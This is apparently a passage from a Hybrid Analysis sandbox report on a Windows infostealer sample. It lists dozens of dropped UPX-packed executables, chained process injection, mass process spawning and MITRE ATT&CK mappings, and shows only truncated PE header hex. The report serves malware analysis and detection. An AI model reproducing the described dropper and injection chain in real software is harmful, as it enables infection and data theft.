\"blvvjn.exe\" wrote 27339 bytes starting with PE header signature to file \"C:\\xfvdbnh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xfvdbnh.exe\" wrote 27354 bytes starting with PE header signature to file \"C:\\pfrdl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pfrdl.exe\" wrote 27369 bytes starting with PE header signature to file \"C:\\xtrhlt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xtrhlt.exe\" wrote 27388 bytes starting with PE header signature to file \"C:\\drppx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"drppx.exe\" wrote 27400 bytes starting with PE header signature to file \"C:\\2406002.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2406002.exe\" wrote 27413 bytes starting with PE header signature to file \"C:\\240402.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"4644224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"62424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"20082.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xxvjvfv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rpfxpvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"66262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6820002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"020066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"fjjxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"82488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"04226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"240402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240402.exe]- [targetUID: 00000000-00004812]\n \"2406002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2406002.exe]- [targetUID: 00000000-00004812]\n \"drppx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\drppx.exe]- [targetUID: 00000000-00001216]\n \"xtrhlt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xtrhlt.exe]- [targetUID: 00000000-00001216]\n \"pfrdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pfrdl.exe]- [targetUID: 00000000-00004716]\n \"xfvdbnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xfvdbnh.exe]- [targetUID: 00000000-00004716]\n \"blvvjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blvvjn.exe]- [targetUID: 00000000-00001424]\n \"fvbpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvbpf.exe]- [targetUID: 00000000-00001424]\n \"ntpjj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntpjj.exe]- [targetUID: 00000000-00000776]\n \"644880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\644880.exe]- [targetUID: 00000000-00000776]\n \"824246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\824246.exe]- [targetUID: 00000000-00002704]\n \"02486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02486.exe]- [targetUID: 00000000-00002792]\n \"66842.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66842.exe]- [targetUID: 00000000-00001632]\n \"2484466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2484466.exe]- [targetUID: 00000000-00001632]\n \"0806084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0806084.exe]- [targetUID: 00000000-00003324]\n \"84800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\84800.exe]- [targetUID: 00000000-00004400]\n \"dfddlr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dfddlr.exe]- [targetUID: 00000000-00004612]\n \"llxxlrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llxxlrt.exe]- [targetUID: 00000000-00004612]\n \"jtpjhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jtpjhr.exe]- [targetUID: 00000000-00003404]\n \"vpvxpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vpvxpp.exe]- [targetUID: 00000000-00003404]\n \"ltjhnht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltjhnht.exe]- [targetUID: 00000000-00003776]\n \"fvxvdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvxvdn.exe]- [targetUID: 00000000-00003776]\n \"thdhnfb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thdhnfb.exe]- [targetUID: 00000000-00001084]\n \"xbrvntf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbrvntf.exe]- [targetUID: 00000000-00003352]\n \"jntndr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jntndr.exe]- [targetUID: 00000000-00003352]\n \"jvxvd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jvxvd.exe]- [targetUID: 00000000-00004148]\n \"pbpbdlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbpbdlp.exe]- [targetUID: 00000000-00003668]\n \"bprdtlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bprdtlh.exe]- [targetUID: 00000000-00003668]\n \"40664.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\40664.exe]- [targetUID: 00000000-00000796]\n \"4444446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4444446.exe]- [targetUID: 00000000-00004604]\n \"28408.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28408.exe]- [targetUID: 00000000-00004604]\n \"620220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620220.exe]- [targetUID: 00000000-00004368]\n \"206666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\206666.exe]- [targetUID: 00000000-00003456]\n \"nhppdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhppdj.exe]- [targetUID: 00000000-00003456]\n \"80426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80426.exe]- [targetUID: 00000000-00004004]\n \"6680468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6680468.exe]- [targetUID: 00000000-00004004]\n \"4448240.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4448240.exe]- [targetUID: 00000000-00001436]\n \"4828644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4828644.exe]- [targetUID: 00000000-00001436]\n \"06204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06204.exe]- [targetUID: 00000000-00000864]\n \"pxxhpb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxxhpb.exe]- [targetUID: 00000000-00000864]\n \"vnvdx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vnvdx.exe]- [targetUID: 00000000-00001856]\n \"tljxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tljxh.exe]- [targetUID: 00000000-00003712]\n \"jjjvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjjvj.exe]- [targetUID: 00000000-00003712]\n \"42020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42020.exe]- [targetUID: 00000000-00003920]\n \"4868486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4868486.exe]- [targetUID: 00000000-00003728]\n \"nhjtnrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nhjtnrr.exe]- [targetUID: 00000000-00003728]\n \"xlfdrhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlfdrhv.exe]- [targetUID: 00000000-00001284]\n \"fplntnd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fplntnd.exe]- [targetUID: 00000000-00001284]\n \"lxdlb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxdlb.exe]- [targetUID: 00000000-00001876]\n \"dtrvhhj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtrvhhj.exe]- [targetUID: 00000000-00001876]\n \"llpbnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llpbnv.exe]- [targetUID: 00000000-00003248]\n \"jdfnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdfnf.exe]- [targetUID: 00000000-00003248]\n \"rxbdpdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxbdpdj.exe]- [targetUID: 00000000-00002708]\n \"vjvxf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjvxf.exe]- [targetUID: 00000000-00002708]\n \"2644808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2644808.exe]- [targetUID: 00000000-00004556]\n \"brftth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brftth.exe]- [targetUID: 00000000-00003468]\n \"hfbrlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfbrlh.exe]- [targetUID: 00000000-00003468]\n \"vhppv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vhppv.exe]- [targetUID: 00000000-00003612]\n \"xhbff.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xhbff.exe]- [targetUID: 00000000-00003228]\n \"rxrfxtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rxrfxtr.exe]- [targetUID: 00000000-00003448]\n \"llxjdlf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\llxjdlf.exe]- [targetUID: 00000000-00003448]\n \"npltvpp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\npltvpp.exe]- [targetUID: 00000000-00002192]\n \"nrtffvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrtffvl.exe]- [targetUID: 00000000-00004544]\n \"lpdvdhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpdvdhr.exe]- [targetUID: 00000000-00004544]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has section name UPX1 with entropy \"7.97244478673\"\n \"4644224.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"62424.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"20082.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xxvjvfv.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"rpfxpvf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"66262.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"6820002.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"020066.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fjjxl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"82488.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"04226.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"240402.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"2406002.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"drppx.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xtrhlt.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"pfrdl.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"xfvdbnh.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"blvvjn.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"fvbpf.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"ntpjj.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"644880.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"824246.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"02486.exe\" has section name UPX1 with entropy \"7.97244478673\"\n \"66842.exe\" has section name UPX1 with entropy \"7.97244478673\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has a section named \"UPX0\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has a section named \"UPX1\"\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2\" has a section named \"UPX2\"\n \"4644224.exe\" has a section named \"UPX0\"\n \"4644224.exe\" has a section named \"UPX1\"\n \"4644224.exe\" has a section named \"UPX2\"\n \"62424.exe\" has a section named \"UPX0\"\n \"62424.exe\" has a section named \"UPX1\"\n \"62424.exe\" has a section named \"UPX2\"\n \"20082.exe\" has a section named \"UPX0\"\n \"20082.exe\" has a section named \"UPX1\"\n \"20082.exe\" has a section named \"UPX2\"\n \"xxvjvfv.exe\" has a section named \"UPX0\"\n \"xxvjvfv.exe\" has a section named \"UPX1\"\n \"xxvjvfv.exe\" has a section named \"UPX2\"\n \"rpfxpvf.exe\" has a section named \"UPX0\"\n \"rpfxpvf.exe\" has a section named \"UPX1\"\n \"rpfxpvf.exe\" has a section named \"UPX2\"\n \"66262.exe\" has a section named \"UPX0\"\n \"66262.exe\" has a section named \"UPX1\"\n \"66262.exe\" has a section named \"UPX2\"\n \"6820002.exe\" has a section named \"UPX0\"\n \"6820002.exe\" has a section named \"UPX1\"\n \"6820002.exe\" has a section named \"UPX2\"\n \"020066.exe\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" (UID: 00000000-00004044)\n Spawned process \"lpdvdhr.exe\" (UID: 00000000-00004544)\n Spawned process \"nrtffvl.exe\" (UID: 00000000-00005960)\n Spawned process \"npltvpp.exe\" (UID: 00000000-00002192)\n Spawned process \"llxjdlf.exe\" (UID: 00000000-00003448)\n Spawned process \"rxrfxtr.exe\" (UID: 00000000-00003228)\n Spawned process \"xhbff.exe\" (UID: 00000000-00003612)\n Spawned process \"vhppv.exe\" (UID: 00000000-00003168)\n Spawned process \"hfbrlh.exe\" (UID: 00000000-00003468)\n Spawned process \"brftth.exe\" (UID: 00000000-00003860)\n Spawned process \"2644808.exe\" (UID: 00000000-00004556)\n Spawned process \"vjvxf.exe\" (UID: 00000000-00002708)\n Spawned process \"rxbdpdj.exe\" (UID: 00000000-00001132)\n Spawned process \"jdfnf.exe\" (UID: 00000000-00003248)\n Spawned process \"llpbnv.exe\" (UID: 00000000-00003220)\n Spawned process \"dtrvhhj.exe\" (UID: 00000000-00001876)\n Spawned process \"lxdlb.exe\" (UID: 00000000-00003720)\n Spawned process \"fplntnd.exe\" (UID: 00000000-00001284)\n Spawned process \"xlfdrhv.exe\" (UID: 00000000-00004100)\n Spawned process \"nhjtnrr.exe\" (UID: 00000000-00003728)\n Spawned process \"4868486.exe\" (UID: 00000000-00003920)\n Spawned process \"42020.exe\" (UID: 00000000-00004244)\n Spawned process \"jjjvj.exe\" (UID: 00000000-00003712)\n Spawned process \"tljxh.exe\" (UID: 00000000-00001856)\n Spawned process \"vnvdx.exe\" (UID: 00000000-00000892)\n Spawned process \"pxxhpb.exe\" (UID: 00000000-00000864)\n Spawned process \"06204.exe\" (UID: 00000000-00003884)\n Spawned process \"4828644.exe\" (UID: 00000000-00001436)\n Spawned process \"4448240.exe\" (UID: 00000000-00004596)\n Spawned process \"6680468.exe\" (UID: 00000000-00004004)\n Spawned process \"80426.exe\" (UID: 00000000-00004088)\n Spawned process \"nhppdj.exe\" (UID: 00000000-00003456)\n Spawned process \"206666.exe\" (UID: 00000000-00003236)\n Spawned process \"620220.exe\" (UID: 00000000-00004368)\n Spawned process \"28408.exe\" (UID: 00000000-00004604)\n Spawned process \"4444446.exe\" (UID: 00000000-00003572)\n Spawned process \"40664.exe\" (UID: 00000000-00000796)\n Spawned process \"bprdtlh.exe\" (UID: 00000000-00003668)\n Spawned process \"pbpbdlp.exe\" (UID: 00000000-00003928)\n Spawned process \"jvxvd.exe\" (UID: 00000000-00004148)\n Spawned process \"jntndr.exe\" (UID: 00000000-00003352)\n Spawned process \"xbrvntf.exe\" (UID: 00000000-00003432)\n Spawned process \"thdhnfb.exe\" (UID: 00000000-00001084)\n Spawned process \"fvxvdn.exe\" (UID: 00000000-00003776)\n Spawned process \"ltjhnht.exe\" (UID: 00000000-00003500)\n Spawned process \"vpvxpp.exe\" (UID: 00000000-00003404)\n Spawned process \"jtpjhr.exe\" (UID: 00000000-00001628)\n Spawned process \"llxxlrt.exe\" (UID: 00000000-00004612)\n Spawned process \"dfddlr.exe\" (UID: 00000000-00004400)\n Spawned process \"84800.exe\" (UID: 00000000-00003324)\n Spawned process \"0806084.exe\" (UID: 00000000-00004808)\n Spawned process \"2484466.exe\" (UID: 00000000-00001632)\n Spawned process \"66842.exe\" (UID: 00000000-00002792)\n Spawned process \"02486.exe\" (UID: 00000000-00003364)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" wrote 32 bytes to a remote process \"C:\\lpdvdhr.exe\" (Handle: 68)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" wrote 52 bytes to a remote process \"C:\\lpdvdhr.exe\" (Handle: 68)\n \"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" wrote 4 bytes to a remote process \"C:\\lpdvdhr.exe\" (Handle: 68)\n \"lpdvdhr.exe\" wrote 32 bytes to a remote process \"C:\\nrtffvl.exe\" (Handle: 68)\n \"lpdvdhr.exe\" wrote 52 bytes to a remote process \"C:\\nrtffvl.exe\" (Handle: 68)\n \"lpdvdhr.exe\" wrote 4 bytes to a remote process \"C:\\nrtffvl.exe\" (Handle: 68)\n \"nrtffvl.exe\" wrote 32 bytes to a remote process \"C:\\npltvpp.exe\" (Handle: 112)\n \"nrtffvl.exe\" wrote 52 bytes to a remote process \"C:\\npltvpp.exe\" (Handle: 112)\n \"nrtffvl.exe\" wrote 4 bytes to a remote process \"C:\\npltvpp.exe\" (Handle: 112)\n \"npltvpp.exe\" wrote 32 bytes to a remote process \"C:\\llxjdlf.exe\" (Handle: 116)\n \"npltvpp.exe\" wrote 52 bytes to a remote process \"C:\\llxjdlf.exe\" (Handle: 116)\n \"npltvpp.exe\" wrote 4 bytes to a remote process \"C:\\llxjdlf.exe\" (Handle: 116)\n \"llxjdlf.exe\" wrote 32 bytes to a remote process \"C:\\rxrfxtr.exe\" (Handle: 68)\n \"llxjdlf.exe\" wrote 52 bytes to a remote process \"C:\\rxrfxtr.exe\" (Handle: 68)\n \"llxjdlf.exe\" wrote 4 bytes to a remote process \"C:\\rxrfxtr.exe\" (Handle: 68)\n \"rxrfxtr.exe\" wrote 32 bytes to a remote process \"C:\\xhbff.exe\" (Handle: 116)\n \"rxrfxtr.exe\" wrote 52 bytes to a remote process \"C:\\xhbff.exe\" (Handle: 116)\n \"rxrfxtr.exe\" wrote 4 bytes to a remote process \"C:\\xhbff.exe\" (Handle: 116)\n \"xhbff.exe\" wrote 32 bytes to a remote process \"C:\\vhppv.exe\" (Handle: 120)\n \"xhbff.exe\" wrote 52 bytes to a remote process \"C:\\vhppv.exe\" (Handle: 120)\n \"xhbff.exe\" wrote 4 bytes to a remote process \"C:\\vhppv.exe\" (Handle: 120)\n \"vhppv.exe\" wrote 32 bytes to a remote process \"C:\\hfbrlh.exe\" (Handle: 116)\n \"vhppv.exe\" wrote 52 bytes to a remote process \"C:\\hfbrlh.exe\" (Handle: 116)\n \"vhppv.exe\" wrote 4 bytes to a remote process \"C:\\hfbrlh.exe\" (Handle: 116)\n \"hfbrlh.exe\" wrote 32 bytes to a remote process \"C:\\brftth.exe\" (Handle: 116)\n \"hfbrlh.exe\" wrote 52 bytes to a remote process \"C:\\brftth.exe\" (Handle: 116)\n \"hfbrlh.exe\" wrote 4 bytes to a remote process \"C:\\brftth.exe\" (Handle: 116)\n \"brftth.exe\" wrote 32 bytes to a remote process \"C:\\2644808.exe\" (Handle: 68)\n \"brftth.exe\" wrote 52 bytes to a remote process \"C:\\2644808.exe\" (Handle: 68)\n \"brftth.exe\" wrote 4 bytes to a remote process \"C:\\2644808.exe\" (Handle: 68)\n \"2644808.exe\" wrote 32 bytes to a remote process \"C:\\vjvxf.exe\" (Handle: 68)\n \"2644808.exe\" wrote 52 bytes to a remote process \"C:\\vjvxf.exe\" (Handle: 68)\n \"2644808.exe\" wrote 4 bytes to a remote process \"C:\\vjvxf.exe\" (Handle: 68)\n \"vjvxf.exe\" wrote 32 bytes to a remote process \"C:\\rxbdpdj.exe\" (Handle: 116)\n \"vjvxf.exe\" wrote 52 bytes to a remote process \"C:\\rxbdpdj.exe\" (Handle: 116)\n \"vjvxf.exe\" wrote 4 bytes to a remote process \"C:\\rxbdpdj.exe\" (Handle: 116)\n \"rxbdpdj.exe\" wrote 32 bytes to a remote process \"C:\\jdfnf.exe\" (Handle: 68)\n \"rxbdpdj.exe\" wrote 52 bytes to a remote process \"C:\\jdfnf.exe\" (Handle: 68)\n \"rxbdpdj.exe\" wrote 4 bytes to a remote process \"C:\\jdfnf.exe\" (Handle: 68)\n \"jdfnf.exe\" wrote 32 bytes to a remote process \"C:\\llpbnv.exe\" (Handle: 116)\n \"jdfnf.exe\" wrote 52 bytes to a remote process \"C:\\llpbnv.exe\" (Handle: 116)\n \"jdfnf.exe\" wrote 4 bytes to a remote process \"C:\\llpbnv.exe\" (Handle: 116)\n \"llpbnv.exe\" wrote 32 bytes to a remote process \"C:\\dtrvhhj.exe\" (Handle: 116)\n \"llpbnv.exe\" wrote 52 bytes to a remote process \"C:\\dtrvhhj.exe\" (Handle: 116)\n \"llpbnv.exe\" wrote 4 bytes to a remote process \"C:\\dtrvhhj.exe\" (Handle: 116)\n \"dtrvhhj.exe\" wrote 32 bytes to a remote process \"C:\\lxdlb.exe\" (Handle: 64)\n \"dtrvhhj.exe\" wrote 52 bytes to a remote process \"C:\\lxdlb.exe\" (Handle: 64)\n \"dtrvhhj.exe\" wrote 4 bytes to a remote process \"C:\\lxdlb.exe\" (Handle: 64)\n \"lxdlb.exe\" wrote 32 bytes to a remote process \"C:\\fplntnd.exe\" (Handle: 120)\n \"lxdlb.exe\" wrote 52 bytes to a remote process \"C:\\fplntnd.exe\" (Handle: 120)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0
https://hybrid-analysis.com/sample/edebb225cd0ef02d994548662c6dff2a521857eaa549f997b51871a32b0396d0
Hybrid Analysis - Infostealers
